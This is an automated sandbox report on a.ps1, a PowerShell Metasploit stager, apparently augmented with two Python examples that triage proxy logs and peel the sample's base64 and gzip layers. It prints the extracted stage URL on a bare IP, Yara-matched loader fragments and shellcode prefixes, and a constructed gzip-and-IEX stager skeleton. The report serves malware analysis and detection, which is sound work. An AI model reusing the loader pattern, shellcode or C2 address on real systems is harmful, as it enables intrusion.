
Windows Analysis Report a.ps1

Overview

General Information

Sample Name: a.ps1
Analysis ID: 444594
MD5: e79502a7f159ee2c72aa997e922559e3
SHA1: 12601ad19988ac4c58a245d151855439dc1a0382
SHA256: 90a17ac3595ed77f5f6cd307b3ffd2cf4c564aa05d132fdb37e7460d4081be70

Detection

Metasploit
Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected MetasploitPayload
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7144 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5964 cmdline: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WerFault.exe (PID: 6244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 900 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)\r\n", "Type": "Metasploit Download", "URL": "http://206.189.69.35/x1Fm"}
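The configuration above gives two network indicators a responder can pivot on: the User-Agent string and the stage URL http://206.189.69.35/x1Fm (the GET for /x1Fm and its 404 reply appear in the Networking section). Metasploit builds stager URIs so that the 8-bit sum of the characters in the first path segment equals a fixed per-platform value from its UriChecksum module; 92 is the value for a Windows stage request, and "x1Fm" sums to 92. The script below is an added triage example, not part of the report or of Joe Security's or Metasploit's code. It scores requests from a constructed proxy log (the log format, the sample lines other than the report's own request, and the weights are assumptions) on three signals: the URI checksum, a bare-IP host with no DNS lookup, and the User-Agent from the extracted configuration.

```python
"""Score HTTP requests for Metasploit reverse_http stager check-ins.

Signals: (1) the first path segment's 8-bit character sum equals one of the
fixed values Metasploit's UriChecksum module assigns per platform (92 for the
Windows stage request: checksum8("x1Fm") == 92); (2) the host is a bare IP,
so no DNS query precedes the connection; (3) the User-Agent equals the one in
the extracted configuration. Log lines are constructed, not from the report."""
from __future__ import annotations

import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# checksum8 targets as defined in Rex::Payloads::Meterpreter::UriChecksum
URI_CHECKSUM = {
    92: "INITW (Windows stager)",
    80: "INITN (other native stager)",
    88: "INITJ (Java)",
    95: "INITP (Python)",
    98: "CONN (existing session)",
}
# User-Agent from the malware configuration extracted in this report
STAGER_UA = ("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; "
             "Trident/5.0; MATP; MATP)")
# Constructed proxy log (assumed format): <ts> <client> <method> <url> "<user-agent>"
SAMPLE_LOG = """\
2021-07-06T09:59:26Z 10.0.0.5 GET http://206.189.69.35/x1Fm "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)"
2021-07-06T09:59:30Z 10.0.0.5 GET http://www.example.com/login "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/89.0"
2021-07-06T09:59:31Z 10.0.0.7 GET http://10.1.2.3/dhcp "curl/7.68.0"
"""
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def checksum8(segment: str) -> int:
    """8-bit sum of the path characters, as Metasploit's handler computes it."""
    return sum(segment.encode("ascii", "ignore")) & 0xFF


def uri_checksum_kind(path: str) -> str | None:
    """Name of the stager type whose checksum the first path segment satisfies, if any."""
    seg = path.lstrip("/").split("/", 1)[0].split("?", 1)[0]
    if len(seg) < 4 or not re.fullmatch(r"[A-Za-z0-9_-]+", seg):
        return None
    return URI_CHECKSUM.get(checksum8(seg))


def is_bare_ip(host: str) -> bool:
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def score_request(host: str, path: str, ua: str) -> tuple[int, list[str]]:
    """Weights are assumptions for this example; tune them to your environment."""
    score, reasons = 0, []
    kind = uri_checksum_kind(path)
    if kind:
        score += 1
        reasons.append(f"URI checksum8 matches {kind}")
    if is_bare_ip(host):
        score += 1
        reasons.append("host is a bare IP (no DNS query expected)")
    if ua == STAGER_UA:
        score += 2
        reasons.append("User-Agent matches extracted Metasploit config")
    return score, reasons


def triage(log: str, threshold: int = 2) -> list[dict]:
    """Return the log entries whose score reaches the threshold."""
    hits = []
    for line in log.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, client, method, url, ua = m.groups()
        u = urlsplit(url)
        score, reasons = score_request(u.hostname or "", u.path, ua)
        if score >= threshold:
            hits.append({"ts": ts, "client": client, "method": method,
                         "url": url, "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["url"], hit["score"], "; ".join(hit["reasons"]))
```

The checksum alone is a weak signal: with five target values, roughly 2% of random short paths collide, which is why the example only flags a request when the checksum coincides with a bare-IP host or the known User-Agent. A 404 from the stage URL, as seen in this run, does not clear the host; the listener may simply have been stopped.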

Yara Overview

Initial Sample

Source | Rule | Description | Author
a.ps1 | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth
  • 0x28:$: ::FromBase64String("H4s
  • 0x28:$: ::FromBase64String("H4sIA

Dropped Files

Source | Rule | Description | Author
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth
  • 0x3b2:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x8ca:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x994:$s5: = [System.Convert]::FromBase64String(
  • 0x626:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x814:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt | Base64_PS1_Shellcode | Detects Base64 encoded PS1 Shellcode | Nick Carr, David Ledbetter
  • 0x9be:$substring: AAAAYInlM
  • 0x9ba:$pattern2: /OiJAAAAYInlM
C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security

The dropped file is a PowerShell transcript (the default transcription log location under Documents), so these rules match the decompressed second-stage script that was executed, not the submitted a.ps1, which only carries the gzip-compressed base64 layer.
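The two Yara layers above fit together: the submitted script matches on ::FromBase64String("H4sI, and "H4sI" is the base64 encoding of the gzip magic 1f 8b 08; the transcript matches on /OiJAAAAYInlM, which is the base64 encoding of fc e8 89 00 00 00 60 89 e5 31, the start of Metasploit's x86 block_api stager (cld; call; pushad; mov ebp,esp; xor edx,edx). The following is an added example, not code from the report, from Joe Security or from Metasploit: it peels both layers from a constructed stager script (the sample script, and the truncated shellcode padded with NOPs, are constructed to mirror the matched strings, not the real a.ps1) and shows where those indicator strings come from.

```python
"""Peel a Metasploit-style PowerShell stager layer by layer.

Layer 1: [Convert]::FromBase64String("H4sI...")  -> gzip stream ("H4sI" is base64 of 1f 8b 08)
Layer 2: [Convert]::FromBase64String('/OiJ...')  -> raw x86 shellcode ("/OiJ" is base64 of fc e8 89)
"""
from __future__ import annotations

import base64
import binascii
import gzip
import re

GZIP_MAGIC = b"\x1f\x8b\x08"
# First bytes of Metasploit's x86 block_api prologue: cld ; call <block_api>
X86_STAGER_PROLOGUE = b"\xfc\xe8"
# Any FromBase64String('...') or FromBase64String("...") literal in the script
B64_CALL = re.compile(r"""FromBase64String\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")


def indicator_for(prefix: bytes) -> str:
    """Base64 text that a byte prefix always produces (whole 3-byte groups only).
    This is why the Yara strings look like H4sI and /OiJAAAAYInl."""
    whole = prefix[: len(prefix) // 3 * 3]
    return base64.b64encode(whole).decode("ascii")


def base64_blobs(script: str) -> list[bytes]:
    """Decode every FromBase64String literal found in a PowerShell script."""
    blobs = []
    for m in B64_CALL.finditer(script):
        try:
            blobs.append(base64.b64decode(m.group(2), validate=True))
        except binascii.Error:
            continue  # not valid base64; skip
    return blobs


def peel(script: str) -> dict:
    """Follow gzip layers until a blob that starts like x86 stager shellcode is found."""
    layers = [script]
    shellcode = None
    pending = [script]
    while pending:
        current = pending.pop()
        for blob in base64_blobs(current):
            if blob.startswith(GZIP_MAGIC):
                try:
                    inner = gzip.decompress(blob).decode("utf-8", errors="replace")
                except (OSError, EOFError):
                    continue  # truncated or corrupt stream
                layers.append(inner)
                pending.append(inner)
            elif blob.startswith(X86_STAGER_PROLOGUE):
                shellcode = blob
    return {"layers": layers, "shellcode": shellcode}


# --- constructed sample modelled on the report's matched strings (not the real a.ps1) ---
SAMPLE_SHELLCODE = (
    # cld; call; pushad; mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30]
    b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
    + b"\x90" * 16  # placeholder for the rest of the stager
)
SAMPLE_INNER = (
    "$sc = [System.Convert]::FromBase64String('"
    + base64.b64encode(SAMPLE_SHELLCODE).decode()
    + "')\n# VirtualAlloc / CreateThread via reflection would follow here\n"
)
SAMPLE_OUTER = (
    '$s = New-Object IO.MemoryStream(,[Convert]::FromBase64String("'
    + base64.b64encode(gzip.compress(SAMPLE_INNER.encode())).decode()
    + '"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,'
    "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"
)

if __name__ == "__main__":
    result = peel(SAMPLE_OUTER)
    print("layers:", len(result["layers"]))
    sc = result["shellcode"]
    print("shellcode prefix:", sc[:9].hex() if sc else None)
```

Running it on a real sample, the layers list is what you hand to a reviewer and the shellcode is what you feed to an emulator; if no blob starts with fc e8, check whether the stage is fetched over the network instead (as this sample does from /x1Fm) rather than embedded.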

Memory Dumps

Source | Rule | Description | Author
00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth
  • 0x34bc:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x39d4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x3a9e:$s5: = [System.Convert]::FromBase64String(
  • 0x3730:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x391e:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp | Base64_PS1_Shellcode | Detects Base64 encoded PS1 Shellcode | Nick Carr, David Ledbetter
  • 0x3ac8:$substring: AAAAYInlM
  • 0x3ac4:$pattern2: /OiJAAAAYInlM
00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
00000005.00000000.700532257.0000000004DFB000.00000004.00000001.sdmp | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
00000000.00000002.758206256.000001CDA068C000.00000004.00000001.sdmp | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
(29 memory dump entries in total; only the first five are listed here)

Sigma Overview

System Summary:

Sigma detected: Non Interactive PowerShell
Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data:
  • Command: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
  • CommandLine: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
  • CommandLine|base64offset|contains: W*'
  • Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1'
  • ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentProcessId: 7144
  • ProcessCommandLine: 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
  • ProcessId: 5964

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: a.ps1 | Avira: detected
Found malware configuration
Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp | Malware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)\r\n", "Type": "Metasploit Download", "URL": "http://206.189.69.35/x1Fm"}
Multi AV Scanner detection for submitted file
Source: a.ps1 | Virustotal: Detection: 50%
Source: a.ps1 | ReversingLabs: Detection: 55%
          Source: Binary string: System.Configuration.Install.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Data.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: umerics.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Numerics.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbTR source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb! source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: .textn.pdb ` source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: gpapi.pdbG source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: anagement.pdb&& source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.Install.pdbLL source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: atl.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: MpOAV.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb\ source: WerFault.exe, 0000000D.00000003.738499813.00000000052BD000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.Install.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb""F` source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb4 source: WER4735.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb9 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.Install.pdbH source: WER4735.tmp.dmp.13.dr
          Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ore.pdb{{ source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb% source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.Install.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: WER4735.tmp.dmp.13.dr
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER4735.tmp.dmp.13.dr
          Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: powershell.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdbo source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: version.pdb/ source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Numerics.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: t.PowerShell.ConsoleHost.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdbRSDSD source: WER4735.tmp.dmp.13.dr
          Source: Binary string: MpOAV.pdbs source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Management.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: nsi.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: shlwapi.pdb5 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb- source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Security.pdbD source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: dpapi.pdbQ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: MpClient.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: userenv.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: irectoryServices.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Data.pdbu source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb\ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: t.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Security.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
